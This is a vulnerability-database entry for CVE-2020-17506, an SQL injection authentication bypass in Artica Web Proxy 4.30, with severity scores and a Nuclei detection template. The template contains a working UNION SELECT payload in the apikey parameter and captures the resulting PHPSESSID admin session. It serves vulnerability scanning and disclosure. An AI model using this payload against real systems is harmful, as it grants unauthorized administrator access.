Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-17506
HistoryAug 20, 2020 - 3:11 p.m.

Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection

2020-08-2015:11:34
ProjectDiscovery
github.com
12

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.959 High

EPSS

Percentile

99.4%

Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.

id: CVE-2020-17506

info:
  name: Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
  author: dwisiswant0
  severity: critical
  description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Upgrade to a patched version of Artica Web Proxy or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506
    - http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.html
    - https://blog.max0x4141.com/post/artica_proxy/
    - https://github.com/hangmansROP/proof-of-concepts
    - https://github.com/merlinepedra/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-17506
    cwe-id: CWE-89
    epss-score: 0.96009
    epss-percentile: 0.99439
    cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: articatech
    product: web_proxy
  tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"

    host-redirects: true
    max-redirects: 1

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "artica-applianc"

      - type: word
        part: header
        words:
          - "PHPSESSID"

      - type: status
        status:
          - 200
          - 301
          - 302
        condition: or

    extractors:
      - type: kval
        kval:
          - "PHPSESSID"
# digest: 4a0a00473045022100f662e4c6ca11d25724a6f673e821f724e1459f0dc49dd7eccfb95ba6f10ec21302203fdd45b3e584bf02ad138c2b3ac177cb72cc83412a78f49d7a0855fe3f749bd7:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.959 High

EPSS

Percentile

99.4%